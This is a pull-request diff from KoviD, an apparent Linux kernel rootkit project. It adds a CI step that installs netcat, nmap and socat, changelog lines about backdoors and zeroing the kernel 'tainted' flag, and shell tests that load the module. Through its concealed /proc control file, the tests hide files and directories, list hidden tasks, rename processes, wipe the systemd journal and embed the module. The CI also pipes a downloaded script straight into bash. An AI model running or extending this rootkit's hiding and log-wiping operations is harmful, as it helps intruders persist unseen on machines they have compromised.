Merge pull request #163 from carloslack/test-v3.0.0

Test v3.0.0

.github/workflows/codeql.yml

@@ -38,7 +38,7 @@ jobs:
           sudo apt-get install --yes python3-pip
           sudo apt-get install --yes libslirp-dev
           sudo apt-get install --yes qemu-system-x86
-          sudo apt-get install --yes netcat
+          sudo apt-get install --yes netcat-traditional
           sudo apt-get install --yes nmap
           sudo apt-get install --yes socat
           sudo bash -c "$(wget -O - https://apt.llvm.org/llvm.sh)"

CHANGELOG.md

@@ -24,7 +24,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 
 ## 2.1.1 - Oct 19 2024
 ### Fixed
--  Fix backdoors deinit from 4ea5cd27
+-  Bug: back-doors deinit
 
 ## 2.1.0 - Oct 18 2024
 ### Added
@@ -42,7 +42,6 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 - Make sure to remove SSL socket file when KoviD in unloaded
 - Memory leak from random strings
 
-
 ## 2.0.0 - Oct 2 2024
 ### Added
 - Zero `/proc/sys/kernel/tainted`

README.md

@@ -26,6 +26,8 @@
     Hides files and directories.
     Explore Demos repository.
 
+NOTE: Although it compiles for Linux Kernel 6.x, it should not yet be used in production.
+
 Watch [KoviD Demos](https://github.com/carloslack/kv-demos/tree/master)
 
 Read [Phrack magazine](http://phrack.org/issues/71/12.html#article) where g1inko works on some challenges posed by KoviD

test/native/base-address-elf.test

@@ -0,0 +1,32 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Run the a.out executable in the background
+../../../test/native/Inputs/a.testexe &
+AOUT_PID=$!  # Capture the PID of a.out
+
+# Wait briefly to ensure a.out has started
+# sleep 1
+
+# Output the PID (for debugging or verification)
+echo "PID of a.out is $AOUT_PID"
+
+echo base-address=$AOUT_PID > /proc/myprocname
+
+cat /proc/myprocname
+
+echo "Deleting kovid"
+sudo rmmod kovid
+
+kill -9 $AOUT_PID
+
+# CHECK: PID of a.out is
+## We expect an address like `55e648a65000`
+# CHECK: {{[5-7]}}{{.*}}
+# Deleting kovid

test/native/hide-dir-test-links.test

@@ -0,0 +1,82 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+# Insert the kernel module
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+PROCNAME="myprocname"
+TEST_DIR="/tmp/test_hide_dir"
+SUBDIR1="subdir1"
+SUBDIR2="subdir2"
+
+# Clean up if something was left from a previous run
+rm -rf "$TEST_DIR"
+mkdir -p "$TEST_DIR/$SUBDIR1"
+mkdir -p "$TEST_DIR/$SUBDIR2"
+
+# Function to get directory link count
+get_link_count() {
+    stat -c %h "$1"
+}
+
+echo "==== Initial State ===="
+
+# Check initial link count
+# A directory typically has at least 2 links: "." and ".."
+initial_links=$(get_link_count "$TEST_DIR")
+echo "Links before hiding: $initial_links"
+
+# CHECK: Links before hiding:
+# This checks we have an initial reference point. We won't assert exact counts in these tests,
+# just verify the logic of increment/decrement.
+
+echo "==== Hide One Directory ===="
+# Hide SUBDIR1
+echo "hide-directory=$TEST_DIR/$SUBDIR1" > /proc/$PROCNAME
+
+after_hide_one=$(get_link_count "$TEST_DIR")
+echo "Links after hiding one directory: $after_hide_one"
+
+# CHECK: Links after hiding one directory:
+# Expect a decrement in link count by 1 (not explicitly checked here, but observed by the tester).
+
+echo "==== Hide Another Directory ===="
+# Hide SUBDIR2
+echo "hide-directory=$TEST_DIR/$SUBDIR2" > /proc/$PROCNAME
+
+after_hide_two=$(get_link_count "$TEST_DIR")
+echo "Links after hiding two directories: $after_hide_two"
+
+# CHECK: Links after hiding two directories:
+# The link count should have decreased again, but must never be less than 2.
+if [ "$after_hide_two" -lt 2 ]; then
+    echo "ERROR: Link count dropped below 2!"
+    exit 1
+fi
+
+echo "==== Un-hide One Directory ===="
+# Unhide SUBDIR1
+echo unhide-directory=$TEST_DIR/$SUBDIR1 > /proc/myprocname
+
+after_unhide_one=$(get_link_count "$TEST_DIR")
+echo "Links after un-hiding one directory: $after_unhide_one"
+
+# CHECK: Links after un-hiding one directory:
+# Should have increased back by 1.
+
+echo "==== Remove Module to Un-hide All ===="
+# Removing the module should restore everything
+sudo rmmod kovid
+
+final_links=$(get_link_count "$TEST_DIR")
+echo "Links after removing module: $final_links"
+
+# CHECK: Links after removing module:
+# Should match the initial count again.
+
+# Cleanup
+rm -rf "$TEST_DIR"

test/native/inject.test

@@ -0,0 +1,22 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s &> %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+# This would break other tests, due to make
+# command, so this can be run individually.
+
+sudo dmesg -c
+
+cd ../../../inject
+cd ../ && PROCNAME=kv make && make strip
+cd -
+./update.sh && make
+sudo ./kv_embed ; dmesg
+cd ../../../build
+sudo rmmod kovid
+
+# CHECK: loaded
+# CHECK: unloaded

test/native/journal.test

@@ -0,0 +1,24 @@
+# REQUIRES: 0
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+sudo journalctl --rotate --vacuum-time=1s
+
+# Remove the kernel module
+sudo rmmod kovid
+
+sudo dmesg
+
+# There are newlines in dmesg output.
+# Tested manually that part.
+
+# CHECK: systemd-journald[{{.*}}]: Received client request to rotate journal.

test/native/list-hidden-files.test

@@ -0,0 +1,36 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Create a test directory and file
+TEST_DIR="/tmp/test_hide_file"
+TEST_FILE="hidden_file.txt"
+mkdir -p "$TEST_DIR"
+touch "$TEST_DIR/$TEST_FILE"
+
+# Hide the file using the backdoor
+echo hide-file="$TEST_DIR/$TEST_FILE" > /proc/myprocname
+
+# Verify that the file is hidden when listing the directory
+ls "$TEST_DIR" | grep "$TEST_FILE" || echo "File is hidden"
+
+echo list-hidden-files > /proc/myprocname
+
+# Cleanup
+rm -rf "$TEST_DIR"
+
+# Remove the kernel module
+sudo rmmod kovid
+
+sudo dmesg
+
+# CHECK: File is hidden
+# CHECK: hidden: 'hidden_file.txt'

test/native/list-hidden-tasks.test

@@ -0,0 +1,25 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+echo list-hidden-tasks > /proc/myprocname
+
+echo "Deleting kovid"
+sudo rmmod kovid
+
+kill -9 $AOUT_PID
+
+sudo dmesg
+
+# CHECK: Kthread : task
+# CHECK: Kthread : task
+# CHECK: Kthread : task
+# CHECK: Kthread : task

test/native/proc-not-visible.test

@@ -0,0 +1,17 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s &> %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+ls /proc/myprocname
+stat /proc/myprocname
+
+echo "Deleting kovid"
+sudo rmmod kovid
+
+# CHECK: No such file or directory
+# CHECK: No such file or directory

test/native/rename-hidden-task.test

@@ -0,0 +1,29 @@
+# REQUIRES: DEBUG_ONLY
+# REQUIRES: NATIVE_TESTS
+
+# RUN: bash %s > %t.log
+# RUN: FileCheck-18 --input-file=%t.log %s
+
+sudo dmesg -c
+sleep 10
+
+sudo insmod ../../../build/kovid.ko
+kill -CONT 31337
+
+# Run the a.out executable in the background
+../../../test/native/Inputs/a.testexe &
+AOUT_PID=$!  # Capture the PID of a.out
+
+# Output the PID (for debugging or verification)
+echo "PID of a.out is $AOUT_PID"
+
+echo $AOUT_PID > /proc/myprocname
+echo rename-task=$AOUT_PID, rename.out > /proc/myprocname
+
+echo "Deleting kovid"
+sudo rmmod kovid
+
+kill -9 $AOUT_PID
+sudo dmesg
+
+# CHECK: New process name: ' rename.out'